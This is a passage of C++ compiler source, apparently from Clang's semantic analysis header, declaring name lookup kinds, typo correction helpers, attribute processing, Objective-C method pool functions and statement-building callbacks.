/// and LookupQualifiedName, which performs qualified name lookup.
///
/// All name lookup is performed based on some specific criteria,
/// which specify what names will be visible to name lookup and how
/// far name lookup should work. These criteria are important both
/// for capturing language semantics (certain lookups will ignore
/// certain names, for example) and for performance, since name
/// lookup is often a bottleneck in the compilation of C++. Name
/// lookup criteria is specified via the LookupCriteria enumeration.
///
/// The results of name lookup can vary based on the kind of name
/// lookup performed, the current language, and the translation
/// unit. In C, for example, name lookup will either return nothing
/// (no entity found) or a single declaration. In C++, name lookup
/// can additionally refer to a set of overloaded functions or
/// result in an ambiguity. All of the possible results of name
/// lookup are captured by the LookupResult class, which provides
/// the ability to distinguish among them.
//@{
/// Describes the kind of name lookup to perform.
enum LookupNameKind {
/// Ordinary name lookup, which finds ordinary names (functions,
/// variables, typedefs, etc.) in C and most kinds of names
/// (functions, variables, members, types, etc.) in C++.
LookupOrdinaryName = 0,
/// Tag name lookup, which finds the names of enums, classes,
/// structs, and unions.
LookupTagName,
/// Label name lookup.
LookupLabel,
/// Member name lookup, which finds the names of
/// class/struct/union members.
LookupMemberName,
/// Look up of an operator name (e.g., operator+) for use with
/// operator overloading. This lookup is similar to ordinary name
/// lookup, but will ignore any declarations that are class members.
LookupOperatorName,
/// Look up a name following ~ in a destructor name. This is an ordinary
/// lookup, but prefers tags to typedefs.
LookupDestructorName,
/// Look up of a name that precedes the '::' scope resolution
/// operator in C++. This lookup completely ignores operator, object,
/// function, and enumerator names (C++ [basic.lookup.qual]p1).
LookupNestedNameSpecifierName,
/// Look up a namespace name within a C++ using directive or
/// namespace alias definition, ignoring non-namespace names (C++
/// [basic.lookup.udir]p1).
LookupNamespaceName,
/// Look up all declarations in a scope with the given name,
/// including resolved using declarations. This is appropriate
/// for checking redeclarations for a using declaration.
LookupUsingDeclName,
/// Look up an ordinary name that is going to be redeclared as a
/// name with linkage. This lookup ignores any declarations that
/// are outside of the current scope unless they have linkage. See
/// C99 6.2.2p4-5 and C++ [basic.link]p6.
LookupRedeclarationWithLinkage,
/// Look up a friend of a local class. This lookup does not look
/// outside the innermost non-class scope. See C++11 [class.friend]p11.
LookupLocalFriendName,
/// Look up the name of an Objective-C protocol.
LookupObjCProtocolName,
/// Look up implicit 'self' parameter of an objective-c method.
LookupObjCImplicitSelfParam,
/// Look up the name of an OpenMP user-defined reduction operation.
LookupOMPReductionName,
/// Look up the name of an OpenMP user-defined mapper.
LookupOMPMapperName,
/// Look up any declaration with any name.
LookupAnyName
};
/// Specifies whether (or how) name lookup is being performed for a
/// redeclaration (vs. a reference).
enum RedeclarationKind {
/// The lookup is a reference to this name that is not for the
/// purpose of redeclaring the name.
NotForRedeclaration = 0,
/// The lookup results will be used for redeclaration of a name,
/// if an entity by that name already exists and is visible.
ForVisibleRedeclaration,
/// The lookup results will be used for redeclaration of a name
/// with external linkage; non-visible lookup results with external linkage
/// may also be found.
ForExternalRedeclaration
};
RedeclarationKind forRedeclarationInCurContext() {
// A declaration with an owning module for linkage can never link against
// anything that is not visible. We don't need to check linkage here; if
// the context has internal linkage, redeclaration lookup won't find things
// from other TUs, and we can't safely compute linkage yet in general.
if (cast<Decl>(CurContext)
->getOwningModuleForLinkage(/*IgnoreLinkage*/true))
return ForVisibleRedeclaration;
return ForExternalRedeclaration;
}
/// The possible outcomes of name lookup for a literal operator.
enum LiteralOperatorLookupResult {
/// The lookup resulted in an error.
LOLR_Error,
/// The lookup found no match but no diagnostic was issued.
LOLR_ErrorNoDiagnostic,
/// The lookup found a single 'cooked' literal operator, which
/// expects a normal literal to be built and passed to it.
LOLR_Cooked,
/// The lookup found a single 'raw' literal operator, which expects
/// a string literal containing the spelling of the literal token.
LOLR_Raw,
/// The lookup found an overload set of literal operator templates,
/// which expect the characters of the spelling of the literal token to be
/// passed as a non-type template argument pack.
LOLR_Template,
/// The lookup found an overload set of literal operator templates,
/// which expect the character type and characters of the spelling of the
/// string literal token to be passed as template arguments.
LOLR_StringTemplate
};
SpecialMemberOverloadResult LookupSpecialMember(CXXRecordDecl *D,
CXXSpecialMember SM,
bool ConstArg,
bool VolatileArg,
bool RValueThis,
bool ConstThis,
bool VolatileThis);
typedef std::function<void(const TypoCorrection &)> TypoDiagnosticGenerator;
typedef std::function<ExprResult(Sema &, TypoExpr *, TypoCorrection)>
TypoRecoveryCallback;
private:
bool CppLookupName(LookupResult &R, Scope *S);
struct TypoExprState {
std::unique_ptr<TypoCorrectionConsumer> Consumer;
TypoDiagnosticGenerator DiagHandler;
TypoRecoveryCallback RecoveryHandler;
TypoExprState();
TypoExprState(TypoExprState &&other) noexcept;
TypoExprState &operator=(TypoExprState &&other) noexcept;
};
/// The set of unhandled TypoExprs and their associated state.
llvm::MapVector<TypoExpr *, TypoExprState> DelayedTypos;
/// Creates a new TypoExpr AST node.
TypoExpr *createDelayedTypo(std::unique_ptr<TypoCorrectionConsumer> TCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC);
// The set of known/encountered (unique, canonicalized) NamespaceDecls.
//
// The boolean value will be true to indicate that the namespace was loaded
// from an AST/PCH file, or false otherwise.
llvm::MapVector<NamespaceDecl*, bool> KnownNamespaces;
/// Whether we have already loaded known namespaces from an extenal
/// source.
bool LoadedExternalKnownNamespaces;
/// Helper for CorrectTypo and CorrectTypoDelayed used to create and
/// populate a new TypoCorrectionConsumer. Returns nullptr if typo correction
/// should be skipped entirely.
std::unique_ptr<TypoCorrectionConsumer>
makeTypoCorrectionConsumer(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
DeclContext *MemberContext, bool EnteringContext,
const ObjCObjectPointerType *OPT,
bool ErrorRecovery);
public:
const TypoExprState &getTypoExprState(TypoExpr *TE) const;
/// Clears the state of the given TypoExpr.
void clearDelayedTypo(TypoExpr *TE);
/// Look up a name, looking for a single declaration. Return
/// null if the results were absent, ambiguous, or overloaded.
///
/// It is preferable to use the elaborated form and explicitly handle
/// ambiguity and overloaded.
NamedDecl *LookupSingleName(Scope *S, DeclarationName Name,
SourceLocation Loc,
LookupNameKind NameKind,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupBuiltin(LookupResult &R);
bool LookupName(LookupResult &R, Scope *S,
bool AllowBuiltinCreation = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
bool InUnqualifiedLookup = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
CXXScopeSpec &SS);
bool LookupParsedName(LookupResult &R, Scope *S, CXXScopeSpec *SS,
bool AllowBuiltinCreation = false,
bool EnteringContext = false);
ObjCProtocolDecl *LookupProtocol(IdentifierInfo *II, SourceLocation IdLoc,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupInSuper(LookupResult &R, CXXRecordDecl *Class);
void LookupOverloadedOperatorName(OverloadedOperatorKind Op, Scope *S,
QualType T1, QualType T2,
UnresolvedSetImpl &Functions);
LabelDecl *LookupOrCreateLabel(IdentifierInfo *II, SourceLocation IdentLoc,
SourceLocation GnuLabelLoc = SourceLocation());
DeclContextLookupResult LookupConstructors(CXXRecordDecl *Class);
CXXConstructorDecl *LookupDefaultConstructor(CXXRecordDecl *Class);
CXXConstructorDecl *LookupCopyingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupCopyingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXConstructorDecl *LookupMovingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupMovingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXDestructorDecl *LookupDestructor(CXXRecordDecl *Class);
bool checkLiteralOperatorId(const CXXScopeSpec &SS, const UnqualifiedId &Id);
LiteralOperatorLookupResult LookupLiteralOperator(Scope *S, LookupResult &R,
ArrayRef<QualType> ArgTys,
bool AllowRaw,
bool AllowTemplate,
bool AllowStringTemplate,
bool DiagnoseMissing);
bool isKnownName(StringRef name);
/// Status of the function emission on the CUDA/HIP/OpenMP host/device attrs.
enum class FunctionEmissionStatus {
Emitted,
CUDADiscarded, // Discarded due to CUDA/HIP hostness
OMPDiscarded, // Discarded due to OpenMP hostness
TemplateDiscarded, // Discarded due to uninstantiated templates
Unknown,
};
FunctionEmissionStatus getEmissionStatus(FunctionDecl *Decl,
bool Final = false);
// Whether the callee should be ignored in CUDA/HIP/OpenMP host/device check.
bool shouldIgnoreInHostDeviceCheck(FunctionDecl *Callee);
void ArgumentDependentLookup(DeclarationName Name, SourceLocation Loc,
ArrayRef<Expr *> Args, ADLResult &Functions);
void LookupVisibleDecls(Scope *S, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool LoadExternal = true);
void LookupVisibleDecls(DeclContext *Ctx, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool IncludeDependentBases = false,
bool LoadExternal = true);
enum CorrectTypoKind {
CTK_NonError, // CorrectTypo used in a non error recovery situation.
CTK_ErrorRecovery // CorrectTypo used in normal error recovery.
};
TypoCorrection CorrectTypo(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind,
Scope *S, CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr,
bool RecordFailure = true);
TypoExpr *CorrectTypoDelayed(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC, CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr);
/// Process any TypoExprs in the given Expr and its children,
/// generating diagnostics as appropriate and returning a new Expr if there
/// were typos that were all successfully corrected and ExprError if one or
/// more typos could not be corrected.
///
/// \param E The Expr to check for TypoExprs.
///
/// \param InitDecl A VarDecl to avoid because the Expr being corrected is its
/// initializer.
///
/// \param Filter A function applied to a newly rebuilt Expr to determine if
/// it is an acceptable/usable result from a single combination of typo
/// corrections. As long as the filter returns ExprError, different
/// combinations of corrections will be tried until all are exhausted.
ExprResult
CorrectDelayedTyposInExpr(Expr *E, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; });
ExprResult
CorrectDelayedTyposInExpr(Expr *E,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(E, nullptr, Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; }) {
return ER.isInvalid() ? ER : CorrectDelayedTyposInExpr(ER.get(), Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(ER, nullptr, Filter);
}
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
bool ErrorRecovery = true);
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
const PartialDiagnostic &PrevNote,
bool ErrorRecovery = true);
void MarkTypoCorrectedFunctionDefinition(const NamedDecl *F);
void FindAssociatedClassesAndNamespaces(SourceLocation InstantiationLoc,
ArrayRef<Expr *> Args,
AssociatedNamespaceSet &AssociatedNamespaces,
AssociatedClassSet &AssociatedClasses);
void FilterLookupForScope(LookupResult &R, DeclContext *Ctx, Scope *S,
bool ConsiderLinkage, bool AllowInlineNamespace);
bool CheckRedeclarationModuleOwnership(NamedDecl *New, NamedDecl *Old);
void DiagnoseAmbiguousLookup(LookupResult &Result);
//@}
/// Attempts to produce a RecoveryExpr after some AST node cannot be created.
ExprResult CreateRecoveryExpr(SourceLocation Begin, SourceLocation End,
ArrayRef<Expr *> SubExprs);
ObjCInterfaceDecl *getObjCInterfaceDecl(IdentifierInfo *&Id,
SourceLocation IdLoc,
bool TypoCorrection = false);
NamedDecl *LazilyCreateBuiltin(IdentifierInfo *II, unsigned ID,
Scope *S, bool ForRedeclaration,
SourceLocation Loc);
NamedDecl *ImplicitlyDefineFunction(SourceLocation Loc, IdentifierInfo &II,
Scope *S);
void AddKnownFunctionAttributesForReplaceableGlobalAllocationFunction(
FunctionDecl *FD);
void AddKnownFunctionAttributes(FunctionDecl *FD);
// More parsing and symbol table subroutines.
void ProcessPragmaWeak(Scope *S, Decl *D);
// Decl attributes - this routine is the top level dispatcher.
void ProcessDeclAttributes(Scope *S, Decl *D, const Declarator &PD);
// Helper for delayed processing of attributes.
void ProcessDeclAttributeDelayed(Decl *D,
const ParsedAttributesView &AttrList);
void ProcessDeclAttributeList(Scope *S, Decl *D, const ParsedAttributesView &AL,
bool IncludeCXX11Attributes = true);
bool ProcessAccessDeclAttributeList(AccessSpecDecl *ASDecl,
const ParsedAttributesView &AttrList);
void checkUnusedDeclAttributes(Declarator &D);
/// Map any API notes provided for this declaration to attributes on the
/// declaration.
///
/// Triggered by declaration-attribute processing.
void ProcessAPINotes(Decl *D);
/// Determine if type T is a valid subject for a nonnull and similar
/// attributes. By default, we look through references (the behavior used by
/// nonnull), but if the second parameter is true, then we treat a reference
/// type as valid.
bool isValidPointerAttrType(QualType T, bool RefOkay = false);
bool CheckRegparmAttr(const ParsedAttr &attr, unsigned &value);
bool CheckCallingConvAttr(const ParsedAttr &attr, CallingConv &CC,
const FunctionDecl *FD = nullptr);
bool CheckAttrTarget(const ParsedAttr &CurrAttr);
bool CheckAttrNoArgs(const ParsedAttr &CurrAttr);
bool checkStringLiteralArgumentAttr(const ParsedAttr &Attr, unsigned ArgNum,
StringRef &Str,
SourceLocation *ArgLocation = nullptr);
bool checkSectionName(SourceLocation LiteralLoc, StringRef Str);
bool checkTargetAttr(SourceLocation LiteralLoc, StringRef Str);
bool checkMSInheritanceAttrOnDefinition(
CXXRecordDecl *RD, SourceRange Range, bool BestCase,
MSInheritanceModel SemanticSpelling);
void CheckAlignasUnderalignment(Decl *D);
/// Adjust the calling convention of a method to be the ABI default if it
/// wasn't specified explicitly. This handles method types formed from
/// function type typedefs and typename template arguments.
void adjustMemberFunctionCC(QualType &T, bool IsStatic, bool IsCtorOrDtor,
SourceLocation Loc);
// Check if there is an explicit attribute, but only look through parens.
// The intent is to look for an attribute on the current declarator, but not
// one that came from a typedef.
bool hasExplicitCallingConv(QualType T);
/// Get the outermost AttributedType node that sets a calling convention.
/// Valid types should not have multiple attributes with different CCs.
const AttributedType *getCallingConvAttributedType(QualType T) const;
/// Check whether a nullability type specifier can be added to the given
/// type through some means not written in source (e.g. API notes).
///
/// \param type The type to which the nullability specifier will be
/// added. On success, this type will be updated appropriately.
///
/// \param nullability The nullability specifier to add.
///
/// \param diagLoc The location to use for diagnostics.
///
/// \param allowArrayTypes Whether to accept nullability specifiers on an
/// array type (e.g., because it will decay to a pointer).
///
/// \param overrideExisting Whether to override an existing, locally-specified
/// nullability specifier rather than complaining about the conflict.
///
/// \returns true if nullability cannot be applied, false otherwise.
bool checkImplicitNullabilityTypeSpecifier(QualType &type,
NullabilityKind nullability,
SourceLocation diagLoc,
bool allowArrayTypes,
bool overrideExisting);
/// Stmt attributes - this routine is the top level dispatcher.
StmtResult ProcessStmtAttributes(Stmt *Stmt,
const ParsedAttributesView &Attrs,
SourceRange Range);
void WarnConflictingTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
void CheckConflictingOverridingMethod(ObjCMethodDecl *Method,
ObjCMethodDecl *Overridden,
bool IsProtocolMethodDecl);
/// WarnExactTypedMethods - This routine issues a warning if method
/// implementation declaration matches exactly that of its declaration.
void WarnExactTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
typedef llvm::SmallPtrSet<Selector, 8> SelectorSet;
/// CheckImplementationIvars - This routine checks if the instance variables
/// listed in the implelementation match those listed in the interface.
void CheckImplementationIvars(ObjCImplementationDecl *ImpDecl,
ObjCIvarDecl **Fields, unsigned nIvars,
SourceLocation Loc);
/// ImplMethodsVsClassMethods - This is main routine to warn if any method
/// remains unimplemented in the class or category \@implementation.
void ImplMethodsVsClassMethods(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool IncompleteImpl = false);
/// DiagnoseUnimplementedProperties - This routine warns on those properties
/// which must be implemented by this implementation.
void DiagnoseUnimplementedProperties(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl *CDecl,
bool SynthesizeProperties);
/// Diagnose any null-resettable synthesized setters.
void diagnoseNullResettableSynthesizedSetters(const ObjCImplDecl *impDecl);
/// DefaultSynthesizeProperties - This routine default synthesizes all
/// properties which must be synthesized in the class's \@implementation.
void DefaultSynthesizeProperties(Scope *S, ObjCImplDecl *IMPDecl,
ObjCInterfaceDecl *IDecl,
SourceLocation AtEnd);
void DefaultSynthesizeProperties(Scope *S, Decl *D, SourceLocation AtEnd);
/// IvarBacksCurrentMethodAccessor - This routine returns 'true' if 'IV' is
/// an ivar synthesized for 'Method' and 'Method' is a property accessor
/// declared in class 'IFace'.
bool IvarBacksCurrentMethodAccessor(ObjCInterfaceDecl *IFace,
ObjCMethodDecl *Method, ObjCIvarDecl *IV);
/// DiagnoseUnusedBackingIvarInAccessor - Issue an 'unused' warning if ivar which
/// backs the property is not used in the property's accessor.
void DiagnoseUnusedBackingIvarInAccessor(Scope *S,
const ObjCImplementationDecl *ImplD);
/// GetIvarBackingPropertyAccessor - If method is a property setter/getter and
/// it property has a backing ivar, returns this ivar; otherwise, returns NULL.
/// It also returns ivar's property on success.
ObjCIvarDecl *GetIvarBackingPropertyAccessor(const ObjCMethodDecl *Method,
const ObjCPropertyDecl *&PDecl) const;
/// Called by ActOnProperty to handle \@property declarations in
/// class extensions.
ObjCPropertyDecl *HandlePropertyInClassExtension(Scope *S,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
unsigned &Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind);
/// Called by ActOnProperty and HandlePropertyInClassExtension to
/// handle creating the ObjcPropertyDecl for a category or \@interface.
ObjCPropertyDecl *CreatePropertyDecl(Scope *S,
ObjCContainerDecl *CDecl,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
const unsigned Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
/// AtomicPropertySetterGetterRules - This routine enforces the rule (via
/// warning) when atomic property has one but not the other user-declared
/// setter or getter.
void AtomicPropertySetterGetterRules(ObjCImplDecl* IMPDecl,
ObjCInterfaceDecl* IDecl);
void DiagnoseOwningPropertyGetterSynthesis(const ObjCImplementationDecl *D);
void DiagnoseMissingDesignatedInitOverrides(
const ObjCImplementationDecl *ImplD,
const ObjCInterfaceDecl *IFD);
void DiagnoseDuplicateIvars(ObjCInterfaceDecl *ID, ObjCInterfaceDecl *SID);
enum MethodMatchStrategy {
MMS_loose,
MMS_strict
};
/// MatchTwoMethodDeclarations - Checks if two methods' type match and returns
/// true, or false, accordingly.
bool MatchTwoMethodDeclarations(const ObjCMethodDecl *Method,
const ObjCMethodDecl *PrevMethod,
MethodMatchStrategy strategy = MMS_strict);
/// MatchAllMethodDeclarations - Check methods declaraed in interface or
/// or protocol against those declared in their implementations.
void MatchAllMethodDeclarations(const SelectorSet &InsMap,
const SelectorSet &ClsMap,
SelectorSet &InsMapSeen,
SelectorSet &ClsMapSeen,
ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool &IncompleteImpl,
bool ImmediateClass,
bool WarnCategoryMethodImpl=false);
/// CheckCategoryVsClassMethodMatches - Checks that methods implemented in
/// category matches with those implemented in its primary class and
/// warns each time an exact match is found.
void CheckCategoryVsClassMethodMatches(ObjCCategoryImplDecl *CatIMP);
/// Add the given method to the list of globally-known methods.
void addMethodToGlobalList(ObjCMethodList *List, ObjCMethodDecl *Method);
/// Returns default addr space for method qualifiers.
LangAS getDefaultCXXMethodAddrSpace() const;
private:
/// AddMethodToGlobalPool - Add an instance or factory method to the global
/// pool. See descriptoin of AddInstanceMethodToGlobalPool.
void AddMethodToGlobalPool(ObjCMethodDecl *Method, bool impl, bool instance);
/// LookupMethodInGlobalPool - Returns the instance or factory method and
/// optionally warns if there are multiple signatures.
ObjCMethodDecl *LookupMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass,
bool instance);
public:
/// - Returns instance or factory methods in global method pool for
/// given selector. It checks the desired kind first, if none is found, and
/// parameter checkTheOther is set, it then checks the other kind. If no such
/// method or only one method is found, function returns false; otherwise, it
/// returns true.
bool
CollectMultipleMethodsInGlobalPool(Selector Sel,
SmallVectorImpl<ObjCMethodDecl*>& Methods,
bool InstanceFirst, bool CheckTheOther,
const ObjCObjectType *TypeBound = nullptr);
bool
AreMultipleMethodsInGlobalPool(Selector Sel, ObjCMethodDecl *BestMethod,
SourceRange R, bool receiverIdOrClass,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
void
DiagnoseMultipleMethodInGlobalPool(SmallVectorImpl<ObjCMethodDecl*> &Methods,
Selector Sel, SourceRange R,
bool receiverIdOrClass);
private:
/// - Returns a selector which best matches given argument list or
/// nullptr if none could be found
ObjCMethodDecl *SelectBestMethod(Selector Sel, MultiExprArg Args,
bool IsInstance,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
/// Record the typo correction failure and return an empty correction.
TypoCorrection FailedCorrection(IdentifierInfo *Typo, SourceLocation TypoLoc,
bool RecordFailure = true) {
if (RecordFailure)
TypoCorrectionFailures[Typo].insert(TypoLoc);
return TypoCorrection();
}
public:
/// AddInstanceMethodToGlobalPool - All instance methods in a translation
/// unit are added to a global pool. This allows us to efficiently associate
/// a selector with a method declaraation for purposes of typechecking
/// messages sent to "id" (where the class of the object is unknown).
void AddInstanceMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/true);
}
/// AddFactoryMethodToGlobalPool - Same as above, but for factory methods.
void AddFactoryMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/false);
}
/// AddAnyMethodToGlobalPool - Add any method, instance or factory to global
/// pool.
void AddAnyMethodToGlobalPool(Decl *D);
/// LookupInstanceMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupInstanceMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/true);
}
/// LookupFactoryMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupFactoryMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/false);
}
const ObjCMethodDecl *SelectorsForTypoCorrection(Selector Sel,
QualType ObjectType=QualType());
/// LookupImplementedMethodInGlobalPool - Returns the method which has an
/// implementation.
ObjCMethodDecl *LookupImplementedMethodInGlobalPool(Selector Sel);
/// CollectIvarsToConstructOrDestruct - Collect those ivars which require
/// initialization.
void CollectIvarsToConstructOrDestruct(ObjCInterfaceDecl *OI,
SmallVectorImpl<ObjCIvarDecl*> &Ivars);
//===--------------------------------------------------------------------===//
// Statement Parsing Callbacks: SemaStmt.cpp.
public:
class FullExprArg {
public:
FullExprArg() : E(nullptr) { }
FullExprArg(Sema &actions) : E(nullptr) { }
ExprResult release() {
return E;
}
Expr *get() const { return E; }
Expr *operator->() {
return E;
}
private:
// FIXME: No need to make the entire Sema class a friend when it's just
// Sema::MakeFullExpr that needs access to the constructor below.
friend class Sema;
explicit FullExprArg(Expr *expr) : E(expr) {}
Expr *E;
};
FullExprArg MakeFullExpr(Expr *Arg) {
return MakeFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation());
}
FullExprArg MakeFullExpr(Expr *Arg, SourceLocation CC) {
return FullExprArg(
ActOnFinishFullExpr(Arg, CC, /*DiscardedValue*/ false).get());
}
FullExprArg MakeFullDiscardedValueExpr(Expr *Arg) {
ExprResult FE =
ActOnFinishFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation(),
/*DiscardedValue*/ true);
return FullExprArg(FE.get());
}
StmtResult ActOnExprStmt(ExprResult Arg, bool DiscardedValue = true);
StmtResult ActOnExprStmtError();
StmtResult ActOnNullStmt(SourceLocation SemiLoc,
bool HasLeadingEmptyMacro = false);
void ActOnStartOfCompoundStmt(bool IsStmtExpr);
void ActOnFinishOfCompoundStmt();
StmtResult ActOnCompoundStmt(SourceLocation L, SourceLocation R,
ArrayRef<Stmt *> Elts, bool isStmtExpr);
/// A RAII object to enter scope of a compound statement.
class CompoundScopeRAII {
public:
CompoundScopeRAII(Sema &S, bool IsStmtExpr = false) : S(S) {
S.ActOnStartOfCompoundStmt(IsStmtExpr);
}
~CompoundScopeRAII() {
S.ActOnFinishOfCompoundStmt();
}
private:
Sema &S;
};
/// An RAII helper that pops function a function scope on exit.
struct FunctionScopeRAII {
Sema &S;
bool Active;
FunctionScopeRAII(Sema &S) : S(S), Active(true) {}
~FunctionScopeRAII() {
if (Active)
S.PopFunctionScopeInfo();
}
void disable() { Active = false; }
};
StmtResult ActOnDeclStmt(DeclGroupPtrTy Decl,
SourceLocation StartLoc,
SourceLocation EndLoc);
void ActOnForEachDeclStmt(DeclGroupPtrTy Decl);
StmtResult ActOnForEachLValueExpr(Expr *E);
ExprResult ActOnCaseExpr(SourceLocation CaseLoc, ExprResult Val);
StmtResult ActOnCaseStmt(SourceLocation CaseLoc, ExprResult LHS,
SourceLocation DotDotDotLoc, ExprResult RHS,
SourceLocation ColonLoc);
void ActOnCaseStmtBody(Stmt *CaseStmt, Stmt *SubStmt);
StmtResult ActOnDefaultStmt(SourceLocation DefaultLoc,
SourceLocation ColonLoc,
Stmt *SubStmt, Scope *CurScope);
StmtResult ActOnLabelStmt(SourceLocation IdentLoc, LabelDecl *TheDecl,
SourceLocation ColonLoc, Stmt *SubStmt);
StmtResult ActOnAttributedStmt(SourceLocation AttrLoc,
ArrayRef<const Attr*> Attrs,
Stmt *SubStmt);
class ConditionResult;
StmtResult ActOnIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult BuildIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult ActOnStartOfSwitchStmt(SourceLocation SwitchLoc,
Stmt *InitStmt,
ConditionResult Cond);
StmtResult ActOnFinishSwitchStmt(SourceLocation SwitchLoc,
Stmt *Switch, Stmt *Body);
StmtResult ActOnWhileStmt(SourceLocation WhileLoc, ConditionResult Cond,
Stmt *Body);
StmtResult ActOnDoStmt(SourceLocation DoLoc, Stmt *Body,
SourceLocation WhileLoc, SourceLocation CondLParen,
Expr *Cond, SourceLocation CondRParen);
StmtResult ActOnForStmt(SourceLocation ForLoc,
SourceLocation LParenLoc,
Stmt *First,
ConditionResult Second,
FullExprArg Third,
SourceLocation RParenLoc,
Stmt *Body);
ExprResult CheckObjCForCollectionOperand(SourceLocation forLoc,
Expr *collection);
StmtResult ActOnObjCForCollectionStmt(SourceLocation ForColLoc,
Stmt *First, Expr *collection,
SourceLocation RParenLoc);
StmtResult FinishObjCForCollectionStmt(Stmt *ForCollection, Stmt *Body);
enum BuildForRangeKind {
/// Initial building of a for-range statement.
BFRK_Build,
/// Instantiation or recovery rebuild of a for-range statement. Don't
/// attempt any typo-correction.
BFRK_Rebuild,
/// Determining whether a for-range statement could be built. Avoid any
/// unnecessary or irreversible actions.
BFRK_Check
};
StmtResult ActOnCXXForRangeStmt(Scope *S, SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
Stmt *LoopVar,
SourceLocation ColonLoc, Expr *Collection,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult BuildCXXForRangeStmt(SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
SourceLocation ColonLoc,
Stmt *RangeDecl, Stmt *Begin, Stmt *End,
Expr *Cond, Expr *Inc,
Stmt *LoopVarDecl,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult FinishCXXForRangeStmt(Stmt *ForRange, Stmt *Body);
StmtResult ActOnGotoStmt(SourceLocation GotoLoc,
SourceLocation LabelLoc,
LabelDecl *TheDecl);
StmtResult ActOnIndirectGotoStmt(SourceLocation GotoLoc,
SourceLocation StarLoc,
Expr *DestExp);
StmtResult ActOnContinueStmt(SourceLocation ContinueLoc, Scope *CurScope);
StmtResult ActOnBreakStmt(SourceLocation BreakLoc, Scope *CurScope);
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind, unsigned NumParams);
typedef std::pair<StringRef, QualType> CapturedParamNameType;
